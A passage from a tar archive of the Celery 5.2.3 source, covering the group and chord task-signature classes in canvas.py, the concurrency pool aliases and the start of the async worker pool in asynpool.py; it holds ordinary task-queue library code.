tasks1, and then zip the results # with the IDs of tasks in the second clone, tasks2. and then, we build # a generator that takes only the task IDs from tasks2. self.tasks = regen(x[0] for x in zip(tasks2, results)) else: new_tasks = [] # Need to unroll subgroups early so that chord gets the # right result instance for chord_unlock etc. results = list(self._freeze_unroll( new_tasks, group_id, chord, root_id, parent_id, )) if isinstance(self.tasks, MutableSequence): self.tasks[:] = new_tasks else: self.tasks = new_tasks return gid, results def freeze(self, _id=None, group_id=None, chord=None, root_id=None, parent_id=None, group_index=None): return self.app.GroupResult(*self._freeze_group_tasks( _id=_id, group_id=group_id, chord=chord, root_id=root_id, parent_id=parent_id, group_index=group_index )) _freeze = freeze def _freeze_tasks(self, tasks, group_id, chord, root_id, parent_id): yield from (task.freeze(group_id=group_id, chord=chord, root_id=root_id, parent_id=parent_id, group_index=group_index) for group_index, task in enumerate(tasks)) def _unroll_tasks(self, tasks): # should be refactored to: (maybe_signature(task, app=self._app, clone=True) for task in tasks) yield from (maybe_signature(task, app=self._app).clone() for task in tasks) def _freeze_unroll(self, new_tasks, group_id, chord, root_id, parent_id): # pylint: disable=redefined-outer-name # XXX chord is also a class in outer scope. stack = deque(self.tasks) group_index = 0 while stack: task = maybe_signature(stack.popleft(), app=self._app).clone() # if this is a group, flatten it by adding all of the group's tasks to the stack if isinstance(task, group): stack.extendleft(task.tasks) else: new_tasks.append(task) yield task.freeze(group_id=group_id, chord=chord, root_id=root_id, parent_id=parent_id, group_index=group_index) group_index += 1 def __repr__(self): if self.tasks: return remove_repeating_from_task( self.tasks[0]['task'], f'group({self.tasks!r})') return 'group()' def __len__(self): return len(self.tasks) @property def app(self): app = self._app if app is None: try: app = self.tasks[0].app except LookupError: pass return app if app is not None else current_app @Signature.register_type(name="chord") class _chord(Signature): r"""Barrier synchronization primitive. A chord consists of a header and a body. The header is a group of tasks that must complete before the callback is called. A chord is essentially a callback for a group of tasks. The body is applied with the return values of all the header tasks as a list. Example: The chord: .. code-block:: pycon >>> res = chord([add.s(2, 2), add.s(4, 4)])(sum_task.s()) is effectively :math:`\Sigma ((2 + 2) + (4 + 4))`: .. code-block:: pycon >>> res.get() 12 """ @classmethod def from_dict(cls, d, app=None): options = d.copy() args, options['kwargs'] = cls._unpack_args(**options['kwargs']) return cls(*args, app=app, **options) @staticmethod def _unpack_args(header=None, body=None, **kwargs): # Python signatures are better at extracting keys from dicts # than manually popping things off. return (header, body), kwargs def __init__(self, header, body=None, task='celery.chord', args=None, kwargs=None, app=None, **options): args = args if args else () kwargs = kwargs if kwargs else {'kwargs': {}} super().__init__(task, args, {**kwargs, 'header': _maybe_group(header, app), 'body': maybe_signature(body, app=app)}, app=app, **options ) self.subtask_type = 'chord' def __call__(self, body=None, **options): return self.apply_async((), {'body': body} if body else {}, **options) def __or__(self, other): if (not isinstance(other, (group, _chain)) and isinstance(other, Signature)): # chord | task -> attach to body sig = self.clone() sig.body = sig.body | other return sig else: return super().__or__(other) def freeze(self, _id=None, group_id=None, chord=None, root_id=None, parent_id=None, group_index=None): # pylint: disable=redefined-outer-name # XXX chord is also a class in outer scope. if not isinstance(self.tasks, group): self.tasks = group(self.tasks, app=self.app) # first freeze all tasks in the header header_result = self.tasks.freeze( parent_id=parent_id, root_id=root_id, chord=self.body) # secondly freeze all tasks in the body: those that should be called after the header body_result = self.body.freeze( _id, root_id=root_id, chord=chord, group_id=group_id, group_index=group_index) # we need to link the body result back to the group result, # but the body may actually be a chain, # so find the first result without a parent node = body_result seen = set() while node: if node.id in seen: raise RuntimeError('Recursive result parents') seen.add(node.id) if node.parent is None: node.parent = header_result break node = node.parent self.id = self.tasks.id return body_result def apply_async(self, args=None, kwargs=None, task_id=None, producer=None, publisher=None, connection=None, router=None, result_cls=None, **options): args = args if args else () kwargs = kwargs if kwargs else {} args = (tuple(args) + tuple(self.args) if args and not self.immutable else self.args) body = kwargs.pop('body', None) or self.kwargs['body'] kwargs = dict(self.kwargs['kwargs'], **kwargs) body = body.clone(**options) app = self._get_app(body) tasks = (self.tasks.clone() if isinstance(self.tasks, group) else group(self.tasks, app=app)) if app.conf.task_always_eager: with allow_join_result(): return self.apply(args, kwargs, body=body, task_id=task_id, **options) merged_options = dict(self.options, **options) if options else self.options option_task_id = merged_options.pop("task_id", None) if task_id is None: task_id = option_task_id # chord([A, B, ...], C) return self.run(tasks, body, args, task_id=task_id, **merged_options) def apply(self, args=None, kwargs=None, propagate=True, body=None, **options): args = args if args else () kwargs = kwargs if kwargs else {} body = self.body if body is None else body tasks = (self.tasks.clone() if isinstance(self.tasks, group) else group(self.tasks, app=self.app)) return body.apply( args=(tasks.apply(args, kwargs).get(propagate=propagate),), ) @classmethod def _descend(cls, sig_obj): # Sometimes serialized signatures might make their way here if not isinstance(sig_obj, Signature) and isinstance(sig_obj, dict): sig_obj = Signature.from_dict(sig_obj) if isinstance(sig_obj, group): # Each task in a group counts toward this chord subtasks = getattr(sig_obj.tasks, "tasks", sig_obj.tasks) return sum(cls._descend(task) for task in subtasks) elif isinstance(sig_obj, _chain): # The last non-empty element in a chain counts toward this chord for child_sig in sig_obj.tasks[-1::-1]: child_size = cls._descend(child_sig) if child_size > 0: return child_size else: # We have to just hope this chain is part of some encapsulating # signature which is valid and can fire the chord body return 0 elif isinstance(sig_obj, chord): # The child chord's body counts toward this chord return cls._descend(sig_obj.body) elif isinstance(sig_obj, Signature): # Each simple signature counts as 1 completion for this chord return 1 # Any other types are assumed to be iterables of simple signatures return len(sig_obj) def __length_hint__(self): tasks = getattr(self.tasks, "tasks", self.tasks) return sum(self._descend(task) for task in tasks) def run(self, header, body, partial_args, app=None, interval=None, countdown=1, max_retries=None, eager=False, task_id=None, **options): app = app or self._get_app(body) group_id = header.options.get('task_id') or uuid() root_id = body.options.get('root_id') options = dict(self.options, **options) if options else self.options if options: options.pop('task_id', None) body.options.update(options) bodyres = body.freeze(task_id, root_id=root_id) # Chains should not be passed to the header tasks. See #3771 options.pop('chain', None) # Neither should chords, for deeply nested chords to work options.pop('chord', None) options.pop('task_id', None) header_result_args = header._freeze_group_tasks(group_id=group_id, chord=body, root_id=root_id) if header.tasks: app.backend.apply_chord( header_result_args, body, interval=interval, countdown=countdown, max_retries=max_retries, ) header_result = header(*partial_args, task_id=group_id, **options) # The execution of a chord body is normally triggered by its header's # tasks completing. If the header is empty this will never happen, so # we execute the body manually here. else: body.delay([]) header_result = self.app.GroupResult(*header_result_args) bodyres.parent = header_result return bodyres def clone(self, *args, **kwargs): signature = super().clone(*args, **kwargs) # need to make copy of body try: signature.kwargs['body'] = maybe_signature( signature.kwargs['body'], clone=True) except (AttributeError, KeyError): pass return signature def link(self, callback): self.body.link(callback) return callback def link_error(self, errback): self.body.link_error(errback) return errback def set_immutable(self, immutable): # changes mutability of header only, not callback. for task in self.tasks: task.set_immutable(immutable) def __repr__(self): if self.body: if isinstance(self.body, _chain): return remove_repeating_from_task( self.body.tasks[0]['task'], '%({} | {!r})'.format( self.body.tasks[0].reprcall(self.tasks), chain(self.body.tasks[1:], app=self._app), ), ) return '%' + remove_repeating_from_task( self.body['task'], self.body.reprcall(self.tasks)) return f'' @cached_property def app(self): return self._get_app(self.body) def _get_app(self, body=None): app = self._app if app is None: try: tasks = self.tasks.tasks # is a group except AttributeError: tasks = self.tasks if tasks: app = tasks[0]._app if app is None and body is not None: app = body._app return app if app is not None else current_app tasks = getitem_property('kwargs.header', 'Tasks in chord header.') body = getitem_property('kwargs.body', 'Body task of chord.') # Add a back-compat alias for the previous `chord` class name which conflicts # with keyword arguments elsewhere in this file chord = _chord def signature(varies, *args, **kwargs): """Create new signature. - if the first argument is a signature already then it's cloned. - if the first argument is a dict, then a Signature version is returned. Returns: Signature: The resulting signature. """ app = kwargs.get('app') if isinstance(varies, dict): if isinstance(varies, abstract.CallableSignature): return varies.clone() return Signature.from_dict(varies, app=app) return Signature(varies, *args, **kwargs) subtask = signature # XXX compat def maybe_signature(d, app=None, clone=False): """Ensure obj is a signature, or None. Arguments: d (Optional[Union[abstract.CallableSignature, Mapping]]): Signature or dict-serialized signature. app (celery.Celery): App to bind signature to. clone (bool): If d' is already a signature, the signature will be cloned when this flag is enabled. Returns: Optional[abstract.CallableSignature] """ if d is not None: if isinstance(d, abstract.CallableSignature): if clone: d = d.clone() elif isinstance(d, dict): d = signature(d) if app is not None: d._app = app return d maybe_subtask = maybe_signature # XXX compat ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.4357502 celery-5.2.3/celery/concurrency/0000775000175000017500000000000000000000000016512 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/concurrency/__init__.py0000664000175000017500000000174300000000000020630 0ustar00asifasif00000000000000"""Pool implementation abstract factory, and alias definitions.""" # Import from kombu directly as it's used # early in the import stage, where celery.utils loads # too much (e.g., for eventlet patching) from kombu.utils.imports import symbol_by_name __all__ = ('get_implementation', 'get_available_pool_names',) ALIASES = { 'prefork': 'celery.concurrency.prefork:TaskPool', 'eventlet': 'celery.concurrency.eventlet:TaskPool', 'gevent': 'celery.concurrency.gevent:TaskPool', 'solo': 'celery.concurrency.solo:TaskPool', 'processes': 'celery.concurrency.prefork:TaskPool', # XXX compat alias } try: import concurrent.futures # noqa: F401 except ImportError: pass else: ALIASES['threads'] = 'celery.concurrency.thread:TaskPool' def get_implementation(cls): """Return pool implementation by name.""" return symbol_by_name(cls, ALIASES) def get_available_pool_names(): """Return all available pool type names.""" return tuple(ALIASES.keys()) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/celery/concurrency/asynpool.py0000664000175000017500000014346500000000000020745 0ustar00asifasif00000000000000"""Version of multiprocessing.Pool using Async I/O. .. note:: This module will be moved soon, so don't use it directly. This is a non-blocking version of :class:`multiprocessing.Pool`. This code deals with three major challenges: #. Starting up child processes and keeping them running. #. Sending jobs to the processes and receiving results back. #. Safely shutting down this system. """ import errno import gc import os import select import time from collections import Counter, deque, namedtuple from io import BytesIO from numbers import Integral from pickle import HIGHEST_PROTOCOL from struct import pack, unpack, unpack_from from time import sleep from weakref import WeakValueDictionary, ref from billiard import pool as _pool from billiard.compat import buf_t, isblocking, setblocking from billiard.pool import ACK, NACK, RUN, TERMINATE, WorkersJoined from billiard.queues import _SimpleQueue from kombu.asynchronous import ERR, WRITE from kombu.serialization import pickle as _pickle from kombu.utils.eventio import SELECT_BAD_FD from kombu.utils.functional import fxrange from vine import promise from celery.utils.functional import noop from celery.utils.log import get_logger from celery.worker import state as worker_state # pylint: disable=redefined-outer-name # We cache globals and attribute lookups, so disable this warning. try: from _billiard import read as __read__ readcanbuf = True except ImportError: # pragma: no cover def __read__(fd, buf, size, read=os.read): chunk = read(fd, size) n = len(chunk) if n != 0: buf.write(chunk) return n readcanbuf = False def unpack_from(fmt, iobuf, unpack=unpack): # noqa return unpack(fmt, iobuf.getvalue()) # <-- BytesIO __all__ = ('AsynPool',) logger = get_logger(__name__) error, debug = logger.error, logger.debug UNAVAIL = frozenset({errno.EAGAIN, errno.EINTR}) #: Constant sent by child process when started (ready to accept work) WORKER_UP = 15 #: A process must've started before this timeout (in secs.) expires. PROC_ALIVE_TIMEOUT = 4.0 SCHED_STRATEGY_FCFS = 1 SCHED_STRATEGY_FAIR = 4 SCHED_STRATEGIES = { None: SCHED_STRATEGY_FAIR, 'default': SCHED_STRATEGY_FAIR, 'fast': SCHED_STRATEGY_FCFS, 'fcfs': SCHED_STRATEGY_FCFS, 'fair': SCHED_STRATEGY_FAIR, } SCHED_STRATEGY_TO_NAME = {v: k for k, v in SCHED_STRATEGIES.items()} Ack = namedtuple('Ack', ('id', 'fd', 'payload')) def gen_not_started(gen): """Return true if generator is not started.""" # gi_frame is None when generator stopped. return gen.gi_frame and gen.gi_frame.f_lasti == -1 def _get_job_writer(job): try: writer = job._writer except AttributeError: pass else: return writer() # is a weakref if hasattr(select, 'poll'): def _select_imp(readers=None, writers=None, err=None, timeout=0, poll=select.poll, POLLIN=select.POLLIN, POLLOUT=select.POLLOUT, POLLERR=select.POLLERR): poller = poll() register = poller.register if readers: [register(fd, POLLIN) for fd in readers] if writers: [register(fd, POLLOUT) for fd in writers] if err: [register(fd, POLLERR) for fd in err] R, W = set(), set() timeout = 0 if timeout and timeout < 0 else round(timeout * 1e3) events = poller.poll(timeout) for fd, event in events: if not isinstance(fd, Integral): fd = fd.fileno() if event & POLLIN: R.add(fd) if event & POLLOUT: W.add(fd) if event & POLLERR: R.add(fd) return R, W, 0 else: def _select_imp(readers=None, writers=None, err=None, timeout=0): r, w, e = select.select(readers, writers, err, timeout) if e: r = list(set(r) | set(e)) return r, w, 0 def _select(readers=None, writers=None, err=None, timeout=0, poll=_select_imp): """Simple wrapper to :class:`~select.select`, using :`~select.poll`. Arguments: readers (Set[Fd]): Set of reader fds to test if readable. writers (Set[Fd]): Set of writer fds to test if writable. err (Set[Fd]): Set of fds to test for error condition. All fd sets passed must be mutable as this function will remove non-working fds from them, this also means the caller must make sure there are still fds in the sets before calling us again. Returns: Tuple[Set, Set, Set]: of ``(readable, writable, again)``, where ``readable`` is a set of fds that have data available for read, ``writable`` is a set of fds that's ready to be written to and ``again`` is a flag that if set means the caller must throw away the result and call us again. """ readers = set() if readers is None else readers writers = set() if writers is None else writers err = set() if err is None else err try: return poll(readers, writers, err, timeout) except OSError as exc: _errno = exc.errno if _errno == errno.EINTR: return set(), set(), 1 elif _errno in SELECT_BAD_FD: for fd in readers | writers | err: try: select.select([fd], [], [], 0) except OSError as exc: _errno = exc.errno if _errno not in SELECT_BAD_FD: raise readers.discard(fd) writers.discard(fd) err.discard(fd) return set(), set(), 1 else: raise def iterate_file_descriptors_safely(fds_iter, source_data, hub_method, *args, **kwargs): """Apply hub method to fds in iter, remove from list if failure. Some file descriptors may become stale through OS reasons or possibly other reasons, so safely manage our lists of FDs. :param fds_iter: the file descriptors to iterate and apply hub_method :param source_data: data source to remove FD if it renders OSError :param hub_method: the method to call with with each fd and kwargs :*args to pass through to the hub_method; with a special syntax string '*fd*' represents a substitution for the current fd object in the iteration (for some callers). :**kwargs to pass through to the hub method (no substitutions needed) """ def _meta_fd_argument_maker(): # uses the current iterations value for fd call_args = args if "*fd*" in call_args: call_args = [fd if arg == "*fd*" else arg for arg in args] return call_args # Track stale FDs for cleanup possibility stale_fds = [] for fd in fds_iter: # Handle using the correct arguments to the hub method hub_args, hub_kwargs = _meta_fd_argument_maker(), kwargs try: # Call the hub method hub_method(fd, *hub_args, **hub_kwargs) except (OSError, FileNotFoundError): logger.warning( "Encountered OSError when accessing fd %s ", fd, exc_info=True) stale_fds.append(fd) # take note of stale fd # Remove now defunct fds from the managed list if source_data: for fd in stale_fds: try: if hasattr(source_data, 'remove'): source_data.remove(fd) else: # then not a list/set ... try dict source_data.pop(fd, None) except ValueError: logger.warning("ValueError trying to invalidate %s from %s", fd, source_data) class Worker(_pool.Worker): """Pool worker process.""" def on_loop_start(self, pid): # our version sends a WORKER_UP message when the process is ready # to accept work, this will tell the parent that the inqueue fd # is writable. self.outq.put((WORKER_UP, (pid,))) class ResultHandler(_pool.ResultHandler): """Handles messages from the pool processes.""" def __init__(self, *args, **kwargs): self.fileno_to_outq = kwargs.pop('fileno_to_outq') self.on_process_alive = kwargs.pop('on_process_alive') super().__init__(*args, **kwargs) # add our custom message handler self.state_handlers[WORKER_UP] = self.on_process_alive def _recv_message(self, add_reader, fd, callback, __read__=__read__, readcanbuf=readcanbuf, BytesIO=BytesIO, unpack_from=unpack_from, load=_pickle.load): Hr = Br = 0 if readcanbuf: buf = bytearray(4) bufv = memoryview(buf) else: buf = bufv = BytesIO() # header while Hr < 4: try: n = __read__( fd, bufv[Hr:] if readcanbuf else bufv, 4 - Hr, ) except OSError as exc: if exc.errno not in UNAVAIL: raise yield else: if n == 0: raise (OSError('End of file during message') if Hr else EOFError()) Hr += n body_size, = unpack_from('>i', bufv) if readcanbuf: buf = bytearray(body_size) bufv = memoryview(buf) else: buf = bufv = BytesIO() while Br < body_size: try: n = __read__( fd, bufv[Br:] if readcanbuf else bufv, body_size - Br, ) except OSError as exc: if exc.errno not in UNAVAIL: raise yield else: if n == 0: raise (OSError('End of file during message') if Br else EOFError()) Br += n add_reader(fd, self.handle_event, fd) if readcanbuf: message = load(BytesIO(bufv)) else: bufv.seek(0) message = load(bufv) if message: callback(message) def _make_process_result(self, hub): """Coroutine reading messages from the pool processes.""" fileno_to_outq = self.fileno_to_outq on_state_change = self.on_state_change add_reader = hub.add_reader remove_reader = hub.remove_reader recv_message = self._recv_message def on_result_readable(fileno): try: fileno_to_outq[fileno] except KeyError: # process gone return remove_reader(fileno) it = recv_message(add_reader, fileno, on_state_change) try: next(it) except StopIteration: pass except (OSError, EOFError): remove_reader(fileno) else: add_reader(fileno, it) return on_result_readable def register_with_event_loop(self, hub): self.handle_event = self._make_process_result(hub) def handle_event(self, *args): # pylint: disable=method-hidden # register_with_event_loop overrides this raise RuntimeError('Not registered with event loop') def on_stop_not_started(self): # This is always used, since we do not start any threads. cache = self.cache check_timeouts = self.check_timeouts fileno_to_outq = self.fileno_to_outq on_state_change = self.on_state_change join_exited_workers = self.join_exited_workers # flush the processes outqueues until they've all terminated. outqueues = set(fileno_to_outq) while cache and outqueues and self._state != TERMINATE: if check_timeouts is not None: # make sure tasks with a time limit will time out. check_timeouts() # cannot iterate and remove at the same time pending_remove_fd = set() for fd in outqueues: iterate_file_descriptors_safely( [fd], self.fileno_to_outq, self._flush_outqueue, pending_remove_fd.add, fileno_to_outq, on_state_change ) try: join_exited_workers(shutdown=True) except WorkersJoined: debug('result handler: all workers terminated') return outqueues.difference_update(pending_remove_fd) def _flush_outqueue(self, fd, remove, process_index, on_state_change): try: proc = process_index[fd] except KeyError: # process already found terminated # this means its outqueue has already been processed # by the worker lost handler. return remove(fd) reader = proc.outq._reader try: setblocking(reader, 1) except OSError: return remove(fd) try: if reader.poll(0): task = reader.recv() else: task = None sleep(0.5) except (OSError, EOFError): return remove(fd) else: if task: on_state_change(task) finally: try: setblocking(reader, 0) except OSError: return remove(fd) class AsynPool(_pool.Pool): """AsyncIO Pool (no threads).""" ResultHandler = ResultHandler Worker = Worker #: Set by :meth:`register_with_event_loop` after running the first time. _registered_with_event_loop = False def WorkerProcess(self, worker): worker = super().WorkerProcess(worker) worker.dead = False return worker def __init__(self, processes=None, synack=False, sched_strategy=None, proc_alive_timeout=None, *args, **kwargs): self.sched_strategy = SCHED_STRATEGIES.get(sched_strategy, sched_strategy) processes = self.cpu_count() if processes is None else processes self.synack = synack # create queue-pairs for all our processes in advance. self._queues = { self.create_process_queues(): None for _ in range(processes) } # inqueue fileno -> process mapping self._fileno_to_inq = {} # outqueue fileno -> process mapping self._fileno_to_outq = {} # synqueue fileno -> process mapping self._fileno_to_synq = {} # We keep track of processes that haven't yet # sent a WORKER_UP message. If a process fails to send # this message within _proc_alive_timeout we terminate it # and hope the next process will recover. self._proc_alive_timeout = ( PROC_ALIVE_TIMEOUT if proc_alive_timeout is None else proc_alive_timeout ) self._waiting_to_start = set() # denormalized set of all inqueues. self._all_inqueues = set() # Set of fds being written to (busy) self._active_writes = set() # Set of active co-routines currently writing jobs. self._active_writers = set() # Set of fds that are busy (executing task) self._busy_workers = set() self._mark_worker_as_available = self._busy_workers.discard # Holds jobs waiting to be written to child processes. self.outbound_buffer = deque() self.write_stats = Counter() super().__init__(processes, *args, **kwargs) for proc in self._pool: # create initial mappings, these will be updated # as processes are recycled, or found lost elsewhere. self._fileno_to_outq[proc.outqR_fd] = proc self._fileno_to_synq[proc.synqW_fd] = proc self.on_soft_timeout = getattr( self._timeout_handler, 'on_soft_timeout', noop, ) self.on_hard_timeout = getattr( self._timeout_handler, 'on_hard_timeout', noop, ) def _create_worker_process(self, i): gc.collect() # Issue #2927 return super()._create_worker_process(i) def _event_process_exit(self, hub, proc): # This method is called whenever the process sentinel is readable. self._untrack_child_process(proc, hub) self.maintain_pool() def _track_child_process(self, proc, hub): """Helper method determines appropriate fd for process.""" try: fd = proc._sentinel_poll except AttributeError: # we need to duplicate the fd here to carefully # control when the fd is removed from the process table, # as once the original fd is closed we cannot unregister # the fd from epoll(7) anymore, causing a 100% CPU poll loop. fd = proc._sentinel_poll = os.dup(proc._popen.sentinel) # Safely call hub.add_reader for the determined fd iterate_file_descriptors_safely( [fd], None, hub.add_reader, self._event_process_exit, hub, proc) def _untrack_child_process(self, proc, hub): if proc._sentinel_poll is not None: fd, proc._sentinel_poll = proc._sentinel_poll, None hub.remove(fd) os.close(fd) def register_with_event_loop(self, hub): """Register the async pool with the current event loop.""" self._result_handler.register_with_event_loop(hub) self.handle_result_event = self._result_handler.handle_event self._create_timelimit_handlers(hub) self._create_process_handlers(hub) self._create_write_handlers(hub) # Add handler for when a process exits (calls maintain_pool) [self._track_child_process(w, hub) for w in self._pool] # Handle_result_event is called whenever one of the # result queues are readable. iterate_file_descriptors_safely( self._fileno_to_outq, self._fileno_to_outq, hub.add_reader, self.handle_result_event, '*fd*') # Timers include calling maintain_pool at a regular interval # to be certain processes are restarted. for handler, interval in self.timers.items(): hub.call_repeatedly(interval, handler) # Add on_poll_start to the event loop only once to prevent duplication # when the Consumer restarts due to a connection error. if not self._registered_with_event_loop: hub.on_tick.add(self.on_poll_start) self._registered_with_event_loop = True def _create_timelimit_handlers(self, hub): """Create handlers used to implement time limits.""" call_later = hub.call_later trefs = self._tref_for_id = WeakValueDictionary() def on_timeout_set(R, soft, hard): if soft: trefs[R._job] = call_later( soft, self._on_soft_timeout, R._job, soft, hard, hub, ) elif hard: trefs[R._job] = call_later( hard, self._on_hard_timeout, R._job, ) self.on_timeout_set = on_timeout_set def _discard_tref(job): try: tref = trefs.pop(job) tref.cancel() del tref except (KeyError, AttributeError): pass # out of scope self._discard_tref = _discard_tref def on_timeout_cancel(R): _discard_tref(R._job) self.on_timeout_cancel = on_timeout_cancel def _on_soft_timeout(self, job, soft, hard, hub): # only used by async pool. if hard: self._tref_for_id[job] = hub.call_later( hard - soft, self._on_hard_timeout, job, ) try: result = self._cache[job] except KeyError: pass # job ready else: self.on_soft_timeout(result) finally: if not hard: # remove tref self._discard_tref(job) def _on_hard_timeout(self, job): # only used by async pool. try: result = self._cache[job] except KeyError: pass # job ready else: self.on_hard_timeout(result) finally: # remove tref self._discard_tref(job) def on_job_ready(self, job, i, obj, inqW_fd): self._mark_worker_as_available(inqW_fd) def _create_process_handlers(self, hub): """Create handlers called on process up/down, etc.""" add_reader, remove_reader, remove_writer = ( hub.add_reader, hub.remove_reader, hub.remove_writer, ) cache = self._cache all_inqueues = self._all_inqueues fileno_to_inq = self._fileno_to_inq fileno_to_outq = self._fileno_to_outq fileno_to_synq = self._fileno_to_synq busy_workers = self._busy_workers handle_result_event = self.handle_result_event process_flush_queues = self.process_flush_queues waiting_to_start = self._waiting_to_start def verify_process_alive(proc): proc = proc() # is a weakref if (proc is not None and proc._is_alive() and proc in waiting_to_start): assert proc.outqR_fd in fileno_to_outq assert fileno_to_outq[proc.outqR_fd] is proc assert proc.outqR_fd in hub.readers error('Timed out waiting for UP message from %r', proc) os.kill(proc.pid, 9) def on_process_up(proc): """Called when a process has started.""" # If we got the same fd as a previous process then we'll also # receive jobs in the old buffer, so we need to reset the # job._write_to and job._scheduled_for attributes used to recover # message boundaries when processes exit. infd = proc.inqW_fd for job in cache.values(): if job._write_to and job._write_to.inqW_fd == infd: job._write_to = proc if job._scheduled_for and job._scheduled_for.inqW_fd == infd: job._scheduled_for = proc fileno_to_outq[proc.outqR_fd] = proc # maintain_pool is called whenever a process exits. self._track_child_process(proc, hub) assert not isblocking(proc.outq._reader) # handle_result_event is called when the processes outqueue is # readable. add_reader(proc.outqR_fd, handle_result_event, proc.outqR_fd) waiting_to_start.add(proc) hub.call_later( self._proc_alive_timeout, verify_process_alive, ref(proc), ) self.on_process_up = on_process_up def _remove_from_index(obj, proc, index, remove_fun, callback=None): # this remove the file descriptors for a process from # the indices. we have to make sure we don't overwrite # another processes fds, as the fds may be reused. try: fd = obj.fileno() except OSError: return try: if index[fd] is proc: # fd hasn't been reused so we can remove it from index. index.pop(fd, None) except KeyError: pass else: remove_fun(fd) if callback is not None: callback(fd) return fd def on_process_down(proc): """Called when a worker process exits.""" if getattr(proc, 'dead', None): return process_flush_queues(proc) _remove_from_index( proc.outq._reader, proc, fileno_to_outq, remove_reader, ) if proc.synq: _remove_from_index( proc.synq._writer, proc, fileno_to_synq, remove_writer, ) inq = _remove_from_index( proc.inq._writer, proc, fileno_to_inq, remove_writer, callback=all_inqueues.discard, ) if inq: busy_workers.discard(inq) self._untrack_child_process(proc, hub) waiting_to_start.discard(proc) self._active_writes.discard(proc.inqW_fd) remove_writer(proc.inq._writer) remove_reader(proc.outq._reader) if proc.synqR_fd: remove_reader(proc.synq._reader) if proc.synqW_fd: self._active_writes.discard(proc.synqW_fd) remove_reader(proc.synq._writer) self.on_process_down = on_process_down def _create_write_handlers(self, hub, pack=pack, dumps=_pickle.dumps, protocol=HIGHEST_PROTOCOL): """Create handlers used to write data to child processes.""" fileno_to_inq = self._fileno_to_inq fileno_to_synq = self._fileno_to_synq outbound = self.outbound_buffer pop_message = outbound.popleft put_message = outbound.append all_inqueues = self._all_inqueues active_writes = self._active_writes active_writers = self._active_writers busy_workers = self._busy_workers diff = all_inqueues.difference add_writer = hub.add_writer hub_add, hub_remove = hub.add, hub.remove mark_write_fd_as_active = active_writes.add mark_write_gen_as_active = active_writers.add mark_worker_as_busy = busy_workers.add write_generator_done = active_writers.discard get_job = self._cache.__getitem__ write_stats = self.write_stats is_fair_strategy = self.sched_strategy == SCHED_STRATEGY_FAIR revoked_tasks = worker_state.revoked getpid = os.getpid precalc = {ACK: self._create_payload(ACK, (0,)), NACK: self._create_payload(NACK, (0,))} def _put_back(job, _time=time.time): # puts back at the end of the queue if job._terminated is not None or \ job.correlation_id in revoked_tasks: if not job._accepted: job._ack(None, _time(), getpid(), None) job._set_terminated(job._terminated) else: # XXX linear lookup, should find a better way, # but this happens rarely and is here to protect against races. if job not in outbound: outbound.appendleft(job) self._put_back = _put_back # called for every event loop iteration, and if there # are messages pending this will schedule writing one message # by registering the 'schedule_writes' function for all currently # inactive inqueues (not already being written to) # consolidate means the event loop will merge them # and call the callback once with the list writable fds as # argument. Using this means we minimize the risk of having # the same fd receive every task if the pipe read buffer is not # full. def on_poll_start(): # Determine which io descriptors are not busy inactive = diff(active_writes) # Determine hub_add vs hub_remove strategy conditional if is_fair_strategy: # outbound buffer present and idle workers exist add_cond = outbound and len(busy_workers) < len(all_inqueues) else: # default is add when data exists in outbound buffer add_cond = outbound if add_cond: # calling hub_add vs hub_remove iterate_file_descriptors_safely( inactive, all_inqueues, hub_add, None, WRITE | ERR, consolidate=True) else: iterate_file_descriptors_safely( inactive, all_inqueues, hub_remove) self.on_poll_start = on_poll_start def on_inqueue_close(fd, proc): # Makes sure the fd is removed from tracking when # the connection is closed, this is essential as fds may be reused. busy_workers.discard(fd) try: if fileno_to_inq[fd] is proc: fileno_to_inq.pop(fd, None) active_writes.discard(fd) all_inqueues.discard(fd) except KeyError: pass self.on_inqueue_close = on_inqueue_close self.hub_remove = hub_remove def schedule_writes(ready_fds, total_write_count=None): if not total_write_count: total_write_count = [0] # Schedule write operation to ready file descriptor. # The file descriptor is writable, but that does not # mean the process is currently reading from the socket. # The socket is buffered so writable simply means that # the buffer can accept at least 1 byte of data. # This means we have to cycle between the ready fds. # the first version used shuffle, but this version # using `total_writes % ready_fds` is about 30% faster # with many processes, and also leans more towards fairness # in write stats when used with many processes # [XXX On macOS, this may vary depending # on event loop implementation (i.e, select/poll vs epoll), so # have to test further] num_ready = len(ready_fds) for _ in range(num_ready): ready_fd = ready_fds[total_write_count[0] % num_ready] total_write_count[0] += 1 if ready_fd in active_writes: # already writing to this fd continue if is_fair_strategy and ready_fd in busy_workers: # worker is already busy with another task continue if ready_fd not in all_inqueues: hub_remove(ready_fd) continue try: job = pop_message() except IndexError: # no more messages, remove all inactive fds from the hub. # this is important since the fds are always writable # as long as there's 1 byte left in the buffer, and so # this may create a spinloop where the event loop # always wakes up. for inqfd in diff(active_writes): hub_remove(inqfd) break else: if not job._accepted: # job not accepted by another worker try: # keep track of what process the write operation # was scheduled for. proc = job._scheduled_for = fileno_to_inq[ready_fd] except KeyError: # write was scheduled for this fd but the process # has since exited and the message must be sent to # another process. put_message(job) continue cor = _write_job(proc, ready_fd, job) job._writer = ref(cor) mark_write_gen_as_active(cor) mark_write_fd_as_active(ready_fd) mark_worker_as_busy(ready_fd) # Try to write immediately, in case there's an error. try: next(cor) except StopIteration: pass except OSError as exc: if exc.errno != errno.EBADF: raise else: add_writer(ready_fd, cor) hub.consolidate_callback = schedule_writes def send_job(tup): # Schedule writing job request for when one of the process # inqueues are writable. body = dumps(tup, protocol=protocol) body_size = len(body) header = pack('>I', body_size) # index 1,0 is the job ID. job = get_job(tup[1][0]) job._payload = buf_t(header), buf_t(body), body_size put_message(job) self._quick_put = send_job def on_not_recovering(proc, fd, job, exc): logger.exception( 'Process inqueue damaged: %r %r: %r', proc, proc.exitcode, exc) if proc._is_alive(): proc.terminate() hub.remove(fd) self._put_back(job) def _write_job(proc, fd, job): # writes job to the worker process. # Operation must complete if more than one byte of data # was written. If the broker connection is lost # and no data was written the operation shall be canceled. header, body, body_size = job._payload errors = 0 try: # job result keeps track of what process the job is sent to. job._write_to = proc send = proc.send_job_offset Hw = Bw = 0 # write header while Hw < 4: try: Hw += send(header, Hw) except Exception as exc: # pylint: disable=broad-except if getattr(exc, 'errno', None) not in UNAVAIL: raise # suspend until more data errors += 